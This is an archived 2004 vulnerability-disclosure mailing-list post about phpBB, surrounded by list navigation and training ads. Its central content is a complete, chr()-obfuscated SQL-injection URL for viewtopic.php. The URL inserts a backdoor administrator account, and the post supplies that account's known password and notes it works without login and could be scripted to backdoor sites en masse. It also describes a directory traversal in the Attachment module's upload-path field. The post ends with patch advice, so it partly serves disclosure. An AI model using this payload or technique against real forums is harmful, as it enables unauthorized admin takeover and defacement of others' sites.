Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

from [zee] Network Security [Permanent Link]
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal
Date: Fri, 26 Nov 2004 20:23:51 +0100
Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable

Howdark update opened wide my eyes with his nice exploit:

Bugtraq id: 10701

-----
viewtopic.php?t=1&highlight=%2527
-----

Looking at the code I saw that was possible inject any type of Sql query with a multiple char() functions.

The following code can add an username with admin rights executing this query:

INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')

And will be added to phpbb_users a new user with admin rights.

*Note we can only execute a working query if we know the tables name. If not we can't. So this work only with a standard installation (usually 95% of websites ;-)

username: ze3lock
pass: thepass

The exploit can be run without being logged in and then you can have access with username. So it's quite simple to make it part of a script that could make backdoors around the web.

For make it working just use the id of a working thread (in this case the thread is 30 - you can see it from the message)

--- Code start ----

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr (73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) %252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% 252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% 252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% 252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) %252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 )%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32 )%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25 2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 )%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108) %252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr (102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 )%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25 2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( 41))%252e%2527

--- code end ---

------------ Attach Module ----------------


In the attach module, I found a directory traversal in the "UPLOAD_DIR" field.

This is the directory where all attachments are supposted to be uploaded.

The field accept any kind of character so you can put instead of 'files' '../../' and all the attachments will be uploaded in the '../..? directory.

That's really dangerous for defacements threat.


--------------- Suggestion ------------------

Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR field in attach module.

Zeelock

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Phpbb id: 10701 update and Attachmodule add-on Directory Traversal, zee <=
Previous by Date:  [Full-Disclosure] [ GLSA 200411-35 ] phpWebSite: HTTP response splitting vulnerability, Matthias Geerdsen
Next by Date:  Immunity, Inc Advisor, Nicolas Waisman
Previous by Thread:  [Full-Disclosure] [ GLSA 200411-35 ] phpWebSite: HTTP response splitting vulnerability, Matthias Geerdsen
Next by Thread:  Immunity, Inc Advisor, Nicolas Waisman
Indexes:  [Date] [Thread] [Top] [All Lists]